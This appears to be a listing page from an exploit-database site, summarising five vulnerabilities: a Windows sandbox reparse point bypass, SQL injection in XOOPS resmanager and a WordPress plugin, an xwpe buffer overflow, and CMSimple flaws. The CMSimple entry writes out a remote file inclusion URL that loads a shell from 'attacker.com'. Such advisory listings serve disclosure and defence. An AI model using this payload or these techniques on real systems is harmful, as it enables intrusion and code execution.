header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux

The fix for CVE-2015-2553 can be bypassed to get limited mount reparse points working again for sandbox attacks. By abusing shadow object directories and creating a dummy directory that shadows GLOBAL??, an attacker can redirect a reparse point to an arbitrary location that they control.

XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the XOOPS Module resmanager version 1.21 or below. The vulnerability exists in the edit_day.php file of the module. By manipulating the 'genreid', 'path', 'karakter', and 'adresim' parameters, an attacker can inject malicious SQL queries into the application's database and retrieve sensitive information. The exploit uses AJAX to send the SQL query and retrieve the result.

Spider Facebook Plugin for WordPress SQL Injection Vulnerability

Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

xwpe – Windows Editor v1.5.30a-2.1 Stack-based Buffer Overflow

xwpe v1.5.30a-2.1 and prior versions are prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Multiple vulnerabilities in CMSimple

An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.

Recent Exploits: